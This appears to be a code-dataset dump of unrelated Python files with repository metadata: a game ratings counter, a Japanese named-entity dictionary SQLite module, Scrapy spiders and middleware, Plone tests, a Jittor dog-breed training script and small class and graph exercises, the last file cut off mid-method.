core = settings.core()
log = logger.logger('logs/system_events.log')
def __init__(self):
pass
def countUserRatings(self):
def countTheUserRating(sort_field, result_field):
self.players.sort(key=lambda x: x[sort_field])
self.players.reverse()
place = 1
for player in self.players:
if 'banned' in player and player['banned']:
player.update({result_field: 100500})
else:
player.update({result_field: place})
place += 1
starttime = time.time()
for player in self.players:
# Умножаем уровень на 100 млн и прибавляем опыт
# чтобы два раза не сравнивать (по уровню и по опыту)
# а учитывать общее значение
player.update({'rating':player['lvl']*100000000+player['exp']})
# Если нет информации о том сколько твитов игрока за день получено
# то считаем 0
if not 'today_parsed_tweets' in player:
player.update({'today_parsed_tweets': 0})
# Если нет информации о том сколько pvp points игрок за день набрал
# то считаем что все (что вчера у него было 0 очков)
if not 'prev_day_pvp' in player:
player.update({'pvp_per_day': player['pvp_score']})
else:
player.update({'pvp_per_day': player['pvp_score'] - player['prev_day_pvp']})
# Считаем рейтинг игрока по метрикам
global_metric = 0
if player['lvl'] == 1:
global_metric = 0
else:
if 'metrics' in player:
if 'monster_kill' in player['metrics']:
for hour in player['metrics']['monster_kill']:
global_metric += (self.balance.max_lvl-player['metrics']['monster_kill'][hour]['lvl']*self.K2)*self.K1*self.K_kill*player['metrics']['monster_kill'][hour]['value']
else:
global_metric = 0
try:
if player['ratings']['trending_position'] <= 10:
if player['ratings']['trending_position'] <= 3:
global_metric = global_metric * 0.7
elif player['ratings']['trending_position'] <= 7:
global_metric = global_metric * 0.8
else:
global_metric = global_metric * 0.9
except Exception:
pass
global_metric = global_metric + global_metric/100 * random.randint(0,self.RD)
player.update({'trending_score': global_metric})
# Считаем место игрока в глобальном рейтинге игроков по опыту,
# Если уровень одинаковый, то выше в рейтинге тот, у кого больше опыта
countTheUserRating('rating', 'rating_by_exp')
# ... в общем рейтинге игроков по pvp points
countTheUserRating('pvp_score', 'rating_by_pvp')
# ... в общем рейтинге игроков по achv_points
countTheUserRating('achv_points', 'rating_by_achv_points')
# ... trending players
countTheUserRating('trending_score', 'trending_position')
for player in self.players:
record = {
'rating_by_exp': player['rating_by_exp'],
'rating_by_pvp': player['rating_by_pvp'],
'rating_by_achv_points': player['rating_by_achv_points'],
'trending_position': player['trending_position'],
'trending_score': player['trending_score']
}
self.mongo.update('players', {'_id':player['_id']}, {'ratings':record})
message = 'Player ratings was counted by '+str(time.time()-starttime)+' seconds'
self.log.write(message)
print message
def countGuildRatings(self):
def countGuildRating(field):
self.guilds.sort(key=lambda x: x[field])
self.guilds.reverse()
place = 1
for guild in self.guilds:
guild.update({field: place})
place += 1
starttime = time.time()
for guild in self.guilds:
guild.update({
'buff_global_metric': 0,
'buff_rating': 0,
'buff_pvp': 0,
'pvp_score': 0,
})
query = []
for id in guild['people']:
query.append({'_id':id})
members = self.mongo.getu('players', search = {'$or':query}, fields = {'lvl':1, 'pvp_score':1, 'ratings':1})
for player in members:
try:
guild['buff_global_metric'] += player['ratings']['trending_score']
guild['buff_rating'] += player['lvl']
guild['buff_pvp'] += player['pvp_score']
except Exception:
pass
if len(members)<5:
guild['buff_global_metric'] = 0
guild['pvp_score'] = int(guild['buff_pvp'])
# Считает место гильдии в глобальном рейтинге гильдии
# по сумме уровня членов гильдии
countGuildRating('buff_rating')
# ... sum trending members
countGuildRating('buff_global_metric')
# .. по общему pvp_score участников
countGuildRating('buff_pvp')
for guild in self.guilds:
record = {
'rating_place_members_lvl': guild['buff_rating'],
'rating_place_members_pvp': guild['buff_pvp'],
'trending_position': guild['buff_global_metric'],
'pvp_score': guild['pvp_score']
}
self.mongo.update('guilds',{'_id':guild['_id']}, {'ratings':record})
message = 'Guilds ratings was counted by '+str(time.time()-starttime)+' seconds'
self.log.write(message)
print message
def countAll(self):
self.players = self.mongo.getu('players', {'banned':{'$exists':False}}, {'_id':1, 'lvl':1, 'exp':1, 'achv_points': 1, 'pvp_score':1, 'metrics':1, 'ratings':1})
self.banned_players = self.mongo.getu('players', {'banned':{'$exists':True}}, {'_id':1, 'lvl':1, 'exp':1, 'achv_points': 1, 'pvp_score':1, 'metrics':1})
self.guilds = self.mongo.getu('guilds',{},{'id':1, 'name':1, 'people':1})
self.countUserRatings()
self.countGuildRatings()
for player in self.banned_players:
record = {
'rating_by_exp': 100500,
'rating_by_pvp': 100500,
'rating_by_achv_points': 100500,
'trending_position': 100500,
'trending_score': 0
}
self.mongo.update('players', {'_id':player['_id']}, record)
self.exit()
def countGameStatistics(self):
count_players = []
for index in range(0, len(self.balance.faction)):
query = {'faction': index, '$or': [{'race': 0}, {'race':1}]}
count_players.append(self.mongo.count('players', query))
count_avg_level = [0,0,0]
players = self.mongo.getu('players', {}, {'lvl':1, 'faction':1})
for player in players:
count_avg_level[player['faction']] += player['lvl']
for index in range(0, len(self.balance.faction)):
try:
count_avg_level[index] = float(int(float(count_avg_level[index]) / count_players[index] * 10))/10
except Exception:
count_avg_level[index] = 0.0
current_time = time.localtime()
hashkey = str(current_time.tm_year) + str(current_time.tm_yday)
lastday_stat = self.mongo.find('game_statistics', {'type': 'lastday_avg_level'})
if not lastday_stat or time.localtime().tm_hour > 20 and not lastday_stat['hashkey'] == hashkey:
self.mongo.update('game_statistics', {'type': 'lastday_avg_level'}, {'type': 'lastday_avg_level', 'data': count_avg_level, 'hashkey': hashkey}, True)
self.mongo.update('game_statistics', {'type': 'lastday_count'}, {'type': 'lastday_count', 'data': count_players, 'hashkey': hashkey}, True)
self.mongo.update('game_statistics', {'type': 'players_count'}, {'type': 'players_count', 'data': count_players}, True)
self.mongo.update('game_statistics', {'type': 'players_avg_level'}, {'type': 'players_avg_level', 'data': count_avg_level}, True)
def exit(self):
self.log.closeFile()
if __name__ == "__main__":
urc = ratingsCounter()
urc.countGameStatistics()
urc.countAll()
| [
"alex.shteinikov@gmail.com"
] | alex.shteinikov@gmail.com |
19ce91ea22e989da8ca864d594d02929a2b81e0f | 2ac1b9ccc4d4f7f646a33e5646ed5e182ae85727 | /jamdict/jmnedict_sqlite.py | 06df43e4840531842c7f6bb7bd7887641f3844a0 | [
"MIT"
] | permissive | killawords/jamdict | 3655185f7097365b184b7979a112469430c4179f | 85c66c19064977adda469e3d0facf5ad9c8c6866 | refs/heads/main | 2023-05-28T22:00:00.813811 | 2021-06-06T04:04:03 | 2021-06-06T04:04:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,061 | py | # -*- coding: utf-8 -*-
"""
Japanese Multilingual Named Entity Dictionary (JMnedict) in SQLite format
References:
ENAMDICT/JMnedict - Japanese Proper Names Dictionary Files
https://www.edrdg.org/enamdict/enamdict_doc.html
"""
# This code is a part of jamdict library: https://github.com/neocl/jamdict
# :copyright: (c) 2020 Le Tuan Anh <tuananh.ke@gmail.com>
# :license: MIT, see LICENSE for more details.
import os
import logging
from typing import Sequence
from puchikarui import Schema
from . import __version__ as JAMDICT_VERSION, __url__ as JAMDICT_URL
from .jmdict import Meta, JMDEntry, KanjiForm, KanaForm, Translation, SenseGloss
# -------------------------------------------------------------------------------
# Configuration
# -------------------------------------------------------------------------------
MY_FOLDER = os.path.dirname(os.path.abspath(__file__))
SCRIPT_FOLDER = os.path.join(MY_FOLDER, 'data')
JMNEDICT_SETUP_FILE = os.path.join(SCRIPT_FOLDER, 'setup_jmnedict.sql')
JMNEDICT_VERSION = '1.08'
JMNEDICT_URL = 'https://www.edrdg.org/enamdict/enamdict_doc.html'
JMNEDICT_DATE = '2020-05-29'
JMNEDICT_SETUP_SCRIPT = '''INSERT INTO meta VALUES ('jmnedict.version', '{jv}');
INSERT INTO meta VALUES ('jmnedict.url', '{ju}');
INSERT INTO meta VALUES ('jmnedict.date', '{jud}');
INSERT INTO meta SELECT 'generator', 'jamdict' WHERE NOT EXISTS (SELECT 1 FROM meta WHERE key = 'generator');
INSERT INTO meta SELECT 'generator_version', '{gv}' WHERE NOT EXISTS (SELECT 1 FROM meta WHERE key = 'generator_version');
INSERT INTO meta SELECT 'generator_url', '{gu}' WHERE NOT EXISTS (SELECT 1 FROM meta WHERE key = 'generator_url');'''.format(
jv=JMNEDICT_VERSION,
ju=JMNEDICT_URL,
jud=JMNEDICT_DATE,
gv=JAMDICT_VERSION,
gu=JAMDICT_URL
)
def getLogger():
return logging.getLogger(__name__)
# -------------------------------------------------------------------------------
# Models
# -------------------------------------------------------------------------------
class JMNEDictSchema(Schema):
def __init__(self, db_path, *args, **kwargs):
super().__init__(db_path, *args, **kwargs)
self.add_script(JMNEDICT_SETUP_SCRIPT)
self.add_file(JMNEDICT_SETUP_FILE)
# Meta
self.add_table('meta', ['key', 'value'], proto=Meta).set_id('key')
self.add_table('NEEntry', ['idseq'])
# Kanji
self.add_table('NEKanji', ['ID', 'idseq', 'text'])
# Kana
self.add_table('NEKana', ['ID', 'idseq', 'text', 'nokanji'])
# Translation (~Sense of JMdict)
self.add_table('NETranslation', ['ID', 'idseq'])
self.add_table('NETransType', ['tid', 'text'])
self.add_table('NETransXRef', ['tid', 'text'])
self.add_table('NETransGloss', ['tid', 'lang', 'gend', 'text'])
class JMNEDictSQLite(JMNEDictSchema):
def __init__(self, db_path, *args, **kwargs):
super().__init__(db_path, *args, **kwargs)
def all_ne_type(self, ctx=None):
if ctx is None:
return self.all_ne_type(ctx=self.ctx())
else:
return [x['text'] for x in ctx.execute("SELECT DISTINCT text FROM NETransType")]
def _build_ne_search_query(self, query):
_is_wildcard_search = '_' in query or '@' in query or '%' in query
if _is_wildcard_search:
where = "idseq IN (SELECT idseq FROM NEKanji WHERE text like ?) OR idseq IN (SELECT idseq FROM NEKana WHERE text like ?) OR idseq IN (SELECT idseq FROM NETranslation JOIN NETransGloss ON NETranslation.ID == NETransGloss.tid WHERE NETransGloss.text like ?) OR idseq IN (SELECT idseq FROM NETranslation JOIN NETransType ON NETranslation.ID == NETransType.tid WHERE NETransType.text like ?)"
else:
where = "idseq IN (SELECT idseq FROM NEKanji WHERE text == ?) OR idseq IN (SELECT idseq FROM NEKana WHERE text == ?) OR idseq IN (SELECT idseq FROM NETranslation JOIN NETransGloss ON NETranslation.ID == NETransGloss.tid WHERE NETransGloss.text == ?) or idseq in (SELECT idseq FROM NETranslation JOIN NETransType ON NETranslation.ID == NETransType.tid WHERE NETransType.text == ?)"
params = [query, query, query, query]
try:
if query.startswith('id#'):
query_int = int(query[3:])
if query_int >= 0:
where = "idseq = ?"
params = [query_int]
except Exception:
pass
getLogger().debug(f"where={where} | params={params}")
return where, params
def search_ne(self, query, ctx=None, **kwargs) -> Sequence[JMDEntry]:
if ctx is None:
with self.ctx() as ctx:
return self.search_ne(query, ctx=ctx)
where, params = self._build_ne_search_query(query)
where = 'SELECT idseq FROM NEEntry WHERE ' + where
entries = []
for (idseq,) in ctx.conn.cursor().execute(where, params):
entries.append(self.get_ne(idseq, ctx=ctx))
return entries
def search_ne_iter(self, query, ctx=None, **kwargs):
if ctx is None:
with self.ctx() as ctx:
return self.search_ne(query, ctx=ctx)
where, params = self._build_ne_search_query(query)
where = 'SELECT idseq FROM NEEntry WHERE ' + where
for (idseq,) in ctx.conn.cursor().execute(where, params):
yield self.get_ne(idseq, ctx=ctx)
def get_ne(self, idseq, ctx=None) -> JMDEntry:
# ensure context
if ctx is None:
with self.ctx() as new_context:
return self.get_entry(idseq, new_context)
# else (a context is provided)
# select entry & info
entry = JMDEntry(idseq)
# select kanji
kanjis = ctx.NEKanji.select('idseq=?', (idseq,))
for dbkj in kanjis:
kj = KanjiForm(dbkj.text)
entry.kanji_forms.append(kj)
# select kana
kanas = ctx.NEKana.select('idseq=?', (idseq,))
for dbkn in kanas:
kn = KanaForm(dbkn.text, dbkn.nokanji)
entry.kana_forms.append(kn)
# select senses
senses = ctx.NETranslation.select('idseq=?', (idseq,))
for dbs in senses:
s = Translation()
# name_type
nts = ctx.NETransType.select('tid=?', (dbs.ID,))
for nt in nts:
s.name_type.append(nt.text)
# xref
xs = ctx.NETransXRef.select('tid=?', (dbs.ID,))
for x in xs:
s.xref.append(x.text)
# SenseGloss
gs = ctx.NETransGloss.select('tid=?', (dbs.ID,))
for g in gs:
s.gloss.append(SenseGloss(g.lang, g.gend, g.text))
entry.senses.append(s)
return entry
def insert_name_entities(self, entries, ctx=None):
# ensure context
if ctx is None:
with self.ctx() as new_context:
return self.insert_name_entities(entries, ctx=new_context)
# else
for entry in entries:
self.insert_name_entity(entry, ctx)
def insert_name_entity(self, entry, ctx=None):
# ensure context
if ctx is None:
with self.ctx() as ctx:
return self.insert_name_entity(entry, ctx=ctx)
# else (a context is provided)
self.NEEntry.insert(entry.idseq, ctx=ctx)
# insert kanji
for kj in entry.kanji_forms:
ctx.NEKanji.insert(entry.idseq, kj.text)
# insert kana
for kn in entry.kana_forms:
ctx.NEKana.insert(entry.idseq, kn.text, kn.nokanji)
# insert translations
for s in entry.senses:
tid = ctx.NETranslation.insert(entry.idseq)
# insert name_type
for nt in s.name_type:
ctx.NETransType.insert(tid, nt)
# xref
for xr in s.xref:
ctx.NETransXRef.insert(tid, xr)
# Gloss
for g in s.gloss:
ctx.NETransGloss.insert(tid, g.lang, g.gend, g.text)
| [
"tuananh.ke@gmail.com"
] | tuananh.ke@gmail.com |
9582722a0a7a9d3283bbfeee9cb7ddad8e6c377f | 67117705720a3e3d81253ba48c1826d36737b126 | /Wk9_STRANDS/integrate.py | 42e4a34b47cb63349193c1740e61a7048b7bc760 | [] | no_license | pyliut/Rokos2021 | 41f0f96bc396b6e8a5e268e31a38a4a4b288c370 | 70753ab29afc45766eb502f91b65cc455e6055e1 | refs/heads/main | 2023-08-13T17:29:30.013829 | 2021-09-26T19:01:35 | 2021-09-26T19:01:35 | 382,092,802 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 506 | py | # -*- coding: utf-8 -*-
"""
Created on Wed Jul 28 15:05:28 2021
@author: pyliu
"""
import numpy as np
def integrate(integrand,spacing):
"""
Numerical integration using rectangles
Parameters
----------
integrand : FLOAT, vector
Values of integrand in the range of integration
spacing : FLOAT, scalar
Width of integrating strips
Returns
-------
FLOAT, scalar
Integrated value
"""
return np.sum(integrand)*spacing | [
"noreply@github.com"
] | pyliut.noreply@github.com |
9c356ecfd41e1d77531a0992d3aeeab8306f56b4 | 24c5c46f1d281fc15de7f6b72a5148ae85f89fb4 | /SRC/demo/imooc/middlewares.py | d2bed55b4f0789f23a3e7d00661f72239c8ef9df | [] | no_license | enterpriseih/easyTest | 22d87c7ffe40fb10a07f7c5cdd505f63dd45adc0 | 43b8d294e898f25055c78313cfece2753352c250 | refs/heads/master | 2023-08-23T22:55:14.798341 | 2020-02-11T09:13:43 | 2020-02-11T09:13:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,174 | py | from scrapy.http import HtmlResponse, Request, Response
from scrapy.exceptions import IgnoreRequest
from multiprocessing import Process, Pipe
from ghost import Ghost
class GhostAction:
def __init__(self, *args, **kwargs):
self.args = args
self.kwargs = kwargs
def do(self, session):
return self.action(session, *self.args, **self.kwargs)
def action(self, session, *args, **kwargs):
raise NotImplementedError
class DefaultOpenAction(GhostAction):
def action(self, session, request):
page, extra_resources = \
session.open(request.url, headers=request.headers)
if request.action:
request.action.do(session)
page_, extra_resources_ = session.wait_for_page_loaded()
if page_:
page, extra_resources = page_, extra_resources_
return page
class GhostRequest(Request):
def __init__(self, url=None, action=None, \
session=None, isLast=False, *args, **kwargs):
if not url:
assert session
url = session.currentUrl
super(GhostRequest, self).__init__(url, *args, dont_filter=True, **kwargs)
self._action = action
self._isLast = isLast
self._session = session
@property
def session(self):
return self._session
@property
def action(self):
return self._action
@property
def isLast(self):
return self._isLast
class GhostResponse(HtmlResponse):
def __init__(self, request, session):
self.request = request
self.session = session
def waitForInit(self):
res = self.session.waitForResult()
if res:
super(GhostResponse, self).__init__(request=self.request, **res)
class GhostMiddleware(object):
@classmethod
def from_crawler(cls, crawler):
return GhostMiddleware()
def process_request(self, request, spider):
if isinstance(request, GhostRequest):
if request.session:
session = request.session
action = request.action
else:
session = GhostSession()
action = DefaultOpenAction(request)
session.commitAction(action, wait=False)
if request.isLast:
session.exit()
return GhostResponse(request, session)
def process_response(self, request, response, spider):
if isinstance(response, GhostResponse):
response.waitForInit()
return response
class GhostSession:
def __init__(self):
# for the request without url
self._currentUrl = None
self.pipe, pipe = Pipe()
self.startGhostProcess(pipe)
def startGhostProcess(self, pipe):
GhostProcess(pipe).start()
def commitAction(self, action, wait=True):
self.pipe.send(action)
if wait:
self.wait()
def waitForResult(self):
res = self.pipe.recv()
self._currentUrl = res['url']
return res
def exit(self):
self.commitAction(None, False)
@property
def currentUrl(self):
return self._currentUrl
class GhostProcess(Process):
def __init__(self, pipe):
super().__init__()
self.pipe = pipe
self.currentPage = None
def sendResult(self, session, page):
res = {
'url': page.url,
'status': page.http_status,
'headers': page.headers,
'body': session.content.encode('utf-8'),
}
self.pipe.send(res)
def updatePage(self, session, page):
if not page:
page, extra_resources = session.wait_for_page_loaded()
if page:
self.currentPage = page
def run(self):
ghost = Ghost()
with ghost.start(download_images=False) as session:
while True:
action = self.pipe.recv()
if action is None:
break
page = action.do(session)
self.updatePage(session, page)
self.sendResult(session, self.currentPage)
| [
"yaolihui0506"
] | yaolihui0506 |
bb0cc5db2017fd3d697c4422d606f0f9508bb1cf | 9e42f3e16f46ae9161490d459adff263a083b5d8 | /ps5.2.py | c7d9e436fb5328bda9b4482482a800516e3687b0 | [] | no_license | rajshakerp/algorithm_crunching_social_network | ba7dd2d7ff748cb9b7e7e93c151285b9c2c2c575 | 2d197a199ea6bb19d65c82a65d72553be107a369 | refs/heads/master | 2020-06-12T08:03:48.949142 | 2014-06-24T21:14:53 | 2014-06-24T21:14:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,460 | py | # compute the weight of co-appear
import csv
import operator
import heapq
def make_link(G, name, book):
if name not in G:
G[name] = {}
(G[name])[book] = 1
if book not in G:
G[book] = {}
(G[book])[name] = 1
return G
def read_graph(filename):
# Read an undirected graph in CSV format. Each line is an edge
tsv = csv.reader(open(filename), delimiter='\t')
G = {}
characters = {}
for (node1, node2) in tsv:
make_link(G, node1, node2)
if node1 not in characters:
characters[node1] = 1
return G, characters
def HG_make_link(CG, ch1, ch2):
if ch1 not in CG:
CG[ch1] = {}
if ch2 not in CG:
CG[ch2] = {}
if ch2 not in CG[ch1]:
CG[ch1][ch2] = 0
if ch1 not in CG[ch2]:
CG[ch2][ch1] = 0
CG[ch1][ch2] += 1
CG[ch2][ch1] += 1
def make_hop_graph(G, characters):
HG = {}
for ch1 in characters:
for book in G[ch1]:
for ch2 in G[book]:
# avoid double counting the route quantities
if ch1 > ch2: HG_make_link(HG, ch1, ch2)
return HG
def WG_make_link(HG, WG, ch1, ch2, routes):
routes[ch1], WG[ch1] = dijkstra(HG, ch1)
def make_weight_graph(HG, characters):
WG = {}
routes = {}
for ch1 in HG:
for ch2 in HG[ch1]:
if ch1 > ch2: WG_make_link(HG, WG, ch1, ch2, routes)
return WG, routes
# should compute the entire route: len([v, b, c, e])
def dijkstra(HG, v):
heap = [(0, v)]
dist_so_far = {v: 0}
route_cnt = {v: 0}
final_dist = {}
while dist_so_far:
(w, k) = heapq.heappop(heap)
if k in final_dist or (k in dist_so_far and w > dist_so_far[k]):
continue
else:
del dist_so_far[k]
final_dist[k] = w
for neighbor in [nb for nb in HG[k] if nb not in final_dist]:
nw = final_dist[k] + 1.00 / HG[k][neighbor]
if neighbor not in dist_so_far or nw < dist_so_far[neighbor]:
dist_so_far[neighbor] = nw
route_cnt[neighbor] = route_cnt[k] + 1
heapq.heappush(heap, (final_dist[k] + 1.00 / HG[k][neighbor], neighbor))
return route_cnt, final_dist
def sub_test():
(marvelG, characters) = ({
'A': {'AB_book', 'AC_book', 'ABCD_book', 'AB_book2'},
'AB_book': {'A', 'B'},
'AB_book2': {'A', 'B'},
'B': {'AB_book', 'BD_book', 'ABCD_book', 'AB_book2'},
'BD_book': {'B', 'D'},
'D': {'BD_book', 'CD_book', 'ABCD_book'},
'CD_book': {'C', 'D'},
'C': {'CD_book', 'AC_book', 'ABCD_book'},
'AC_book': {'A', 'C'},
'ABCD_book': {'A', 'B', 'C', 'D'}
}, {'A': 1, 'B': 1, 'C': 1, 'D': 1})
HG = make_hop_graph(marvelG, characters)
(WG, w_routes) = make_weight_graph(HG, characters)
print HG
print WG
print w_routes
count = 0
for ch1 in w_routes:
for ch2 in w_routes[ch1]:
if ch1 != ch2 and 1 != w_routes[ch1][ch2]:
count += 1
print count
def test():
(marvelG, characters) = read_graph('marvel_graph')
HG = make_hop_graph(marvelG, characters)
(WG, w_routes) = make_weight_graph(HG, characters)
count = 0
for ch1 in w_routes:
for ch2 in w_routes[ch1]:
if ch1 != ch2 and 1 != w_routes[ch1][ch2]:
count += 1
print count
sub_test()
test()
| [
"="
] | = |
03c7db3d432555998947878d40132af841780c83 | 57ef48cbc61bc3bf890088ec24a50c440bc36072 | /dogflb/train-tiny.py | 5abdd5e1943352ec94cd42ee7dac641ef5b1603d | [] | no_license | ShenDezhou/CAIL2021 | 8be1ea07dd47085126b9092998de72dc0c70973d | aab19b42e9ea1ba29158df577087e827419adae8 | refs/heads/master | 2023-03-28T11:17:09.541712 | 2021-03-29T14:11:40 | 2021-03-29T14:11:40 | 328,170,130 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,373 | py | import os
import jittor as jt
import jittor.nn as nn
from dataset import TsinghuaDog
from jittor import transform
from jittor.optim import Adam, SGD
from tqdm import tqdm
import numpy as np
from model import Net
import argparse
jt.flags.use_cuda=1
def get_path(path):
"""Create the path if it does not exist.
Args:
path: path to be used
Returns:
Existed path
"""
if not os.path.exists(os.path.dirname(path)):
os.makedirs(os.path.dirname(path))
return path
def train(model, train_loader, optimizer, epoch):
model.train()
total_acc = 0
total_num = 0
losses = 0.0
pbar = tqdm(train_loader, desc=f'Epoch {epoch} [TRAIN]')
for images, labels in pbar:
output = model(images)
loss = nn.cross_entropy_loss(output, labels)
optimizer.step(loss)
pred = np.argmax(output.data, axis=1)
acc = np.mean(pred == labels.data) * 100
total_acc += acc
total_num += labels.shape[0]
losses += loss
pbar.set_description(f'Epoch {epoch} [TRAIN] loss = {loss.data[0]:.2f}, acc = {acc:.2f}')
best_acc = -1.0
def evaluate(model, val_loader, epoch=0, save_path='./best_model.bin'):
model.eval()
global best_acc
total_acc = 0
total_num = 0
pbar = tqdm(val_loader, desc=f'Epoch {epoch} [EVAL]')
for images, labels in pbar:
output = model(images)
pred = np.argmax(output.data, axis=1)
acc = np.sum(pred == labels.data)
total_acc += acc
total_num += labels.shape[0]
pbar.set_description(f'Epoch {epoch} [EVAL] acc = {total_acc / total_num :.2f}')
acc = total_acc / total_num
if acc > best_acc:
best_acc = acc
get_path(save_path)
model.save(save_path)
print ('Test in epoch', epoch, 'Accuracy is', acc, 'Best accuracy is', best_acc)
#python train-tiny.py --epochs 5 --batch_size 32 --dataroot /mnt/data/dogfldocker --model_path model/res50/model.bin --resume False
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--batch_size', type=int, default=32)
parser.add_argument('--epochs', type=int, default=50)
parser.add_argument('--num_classes', type=int, default=130)
parser.add_argument('--lr', type=float, default=2e-3)
parser.add_argument('--weight_decay', type=float, default=1e-5)
parser.add_argument('--resume', type=bool, default=False)
parser.add_argument('--eval', type=bool, default=False)
parser.add_argument('--dataroot', type=str, default='/content/drive/MyDrive/dogflg/data2/')
parser.add_argument('--model_path', type=str, default='./best_model.bin')
parser.add_argument('--sampleratio', type=float, default=0.8)
args = parser.parse_args()
transform_train = transform.Compose([
transform.Resize((256, 256)),
transform.CenterCrop(224),
transform.RandomHorizontalFlip(),
transform.ToTensor(),
transform.ImageNormalize(0.485, 0.229),
# transform.ImageNormalize(0.485, 0.456, 0.406], [0.229, 0.224, 0.225]),
])
root_dir = args.dataroot
train_loader = TsinghuaDog(root_dir, batch_size=args.batch_size, train=True, part='train', shuffle=True, transform=transform_train, sample_rate=args.sampleratio)
transform_test = transform.Compose([
transform.Resize((256, 256)),
transform.CenterCrop(224),
transform.ToTensor(),
transform.ImageNormalize(0.485, 0.229),
# transform.ImageNormalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]),
])
val_loader = TsinghuaDog(root_dir, batch_size=args.batch_size, train=False, part='val', shuffle=False, transform=transform_test, sample_rate=args.sampleratio)
epochs = args.epochs
model = Net(num_classes=args.num_classes)
lr = args.lr
weight_decay = args.weight_decay
optimizer = SGD(model.parameters(), lr=lr, momentum=0.99)
if args.resume:
model.load(args.model_path)
print('model loaded', args.model_path)
#random save for test
#model.save(args.model_path)
if args.eval:
evaluate(model, val_loader, save_path=args.model_path)
return
for epoch in range(epochs):
train(model, train_loader, optimizer, epoch)
evaluate(model, val_loader, epoch, save_path=args.model_path)
if __name__ == '__main__':
main()
| [
"bangtech@sina.com"
] | bangtech@sina.com |
9ef838759387609b5be7812eeda6c96df2a63f72 | 1cb8f578fab815e7031b9302b809d2fce1bad56f | /plone/app/s5slideshow/tests/base.py | 25e2d02fbf315c5cee64b5438058531f37813840 | [] | no_license | toutpt/plone.app.s5slideshow | 103856fdefc6504193e9d5b981fa377c7c5ace1a | ee2129c3e40cc03fadad2490730100ad715f5395 | refs/heads/master | 2020-06-04T15:18:27.754687 | 2012-02-28T07:52:39 | 2012-02-28T07:52:39 | 3,160,939 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,002 | py | import unittest2 as unittest
from zope import interface
from plone.app import testing
from plone.app.s5slideshow.tests import layer
class UnitTestCase(unittest.TestCase):
def setUp(self):
super(UnitTestCase, self).setUp()
class TestCase(unittest.TestCase):
layer = layer.INTEGRATION
def setUp(self):
from ZPublisher.tests.testPublish import Request
super(TestCase, self).setUp()
self.portal = self.layer['portal']
self.request = Request()
class FunctionalTestCase(unittest.TestCase):
layer = layer.FUNCTIONAL
def setUp(self):
super(FunctionalTestCase, self).setUp()
self.portal = self.layer['portal']
testing.setRoles(self.portal, testing.TEST_USER_ID, ['Manager'])
testing.setRoles(self.portal, testing.TEST_USER_ID, ['Member'])
def build_test_suite(test_classes):
suite = unittest.TestSuite()
for klass in test_classes:
suite.addTest(unittest.makeSuite(klass))
return suite
| [
"toutpt@gmail.com"
] | toutpt@gmail.com |
18821b556650d403c0a02ae62e4c2f09bc774a23 | 51fb5fe41a2c5030fb9e46a029f80e8b637714f3 | /factory_app/factory.py | be6e96c991075f0550c8462cc83bba811227800a | [] | no_license | aliensmart/week2_day3 | 6c7512c77c09424c87cdd64fe634b23ae54ffa21 | 21125022850c398aa0b68295f2e40ca18c573f13 | refs/heads/master | 2020-07-13T05:31:44.581603 | 2019-08-29T19:25:27 | 2019-08-29T19:25:27 | 205,004,610 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,503 | py | #!/usr/bin/env python3
#Class
# Worker
# Item
# Factory
class Worker:
#attribute:
# name
# job
# years
# department is None
def __init__(self, name, job, years):
self.name = name
self.job = job
self.years = years
self.department = None
#Create methods set_department and increase_tenure
def set_department(self,depart):
"""
will take in a string,
and re-assign the worker's
department for the day
"""
self.department = depart
def increase_tenure(self):
"""
will add one year to the number
of years this worker has been
at the factory.
"""
self.years +=1
class Item:
#Attributes:
#name
#explosive
#weight
#cost
def __init__(self, name, explosive, weight, cost):
self.name = name
self.explosive = explosive
self.weight = weight
self.cost = cost
#create method explod
def explode(self):
"""
If explosive == True, our method
will print Boom!
"""
if self.explosive == True:
return "Boom"
battery = Item("battery", True, "4lbs", 200.99)
class Factory:
#attribut:
# workers is the list of worker obj
# products is the list of items
# days_since_last_incident
def __init__(self, workers = [], products =[]):
self.workers = workers
self.products = products
self.days_since_last_incident = 0
#method need:
# add_worker
# create_product
# ship
# add_day
# incident
def add_worker(self, worker):
"""
add a Worker object to our
self.workers list
"""
self.workers.append(worker)
def create_product(self, item):
"""
add an Item object to our
self.products list
"""
self.products.append(item)
def ship(self):
"""
should remove everything from our current
"""
self.products = []
def add_day(self):
"""
should add 1 to our
self.days_without_incident attribute
"""
self.days_since_last_incident +=1
def incident(self):
"""
re-assign self.days_without_incident to 0
"""
self.days_since_last_incident = 0
| [
"kaoua17@gmail.com"
] | kaoua17@gmail.com |
34eb6021b51846ce284b8d310da82c2d4e56b2e5 | e905abd9bb7bd7017657d0a0c4d724d16e37044c | /.history/article/spiders/acm_20201230145258.py | 2bfa13a12a05f543b22b93f69e8ea2d0698e1dd7 | [] | no_license | tabdelbari/articles | a8b921841f84fb473f5ed1cdcda743863e6bc246 | f0e1dfdc9e818e43095933139b6379a232647898 | refs/heads/main | 2023-03-05T10:21:35.565767 | 2021-02-10T13:35:14 | 2021-02-10T13:35:14 | 325,654,973 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,360 | py | import scrapy
import logging
import re
from scrapy_splash import SplashRequest
from article.items import ArticleItem
class AcmSpider(scrapy.Spider):
name = 'acm'
allowed_domains = ['acm.org']
def __init__(self, topic='', keywords='', **kwargs):
super().__init__(**kwargs)
self.start_urls = ['https://dl.acm.org/action/doSearch?AllField=%s' %keywords]
self.topic = topic
def start_requests(self):
for url in self.start_urls:
yield SplashRequest(url, callback=self.find_articles, args={ 'wait': 10 })
def find_articles(self, response):
# logging.info(response.text)
articles_urls = response.xpath('.//*/div[contains(@class,"issue-item")]/*/h5/span/a/@href').getall()
logging.info(f'{len(articles_urls)} articles found')
for url in articles_urls:
article_url = 'https://dl.acm.org' + url
yield SplashRequest(article_url, callback=self.parse, args={ 'wait': 10 })
next_page = response.xpath('.//*/nav[contains(@class, "pagination")]/span/a[@title="Next Page"]/@href').get(default='')
logging.info('Next page found:')
if next_page != '':
yield SplashRequest(next_page, callback=self.find_articles, args={ 'wait': 10 })
def parse(self, response):
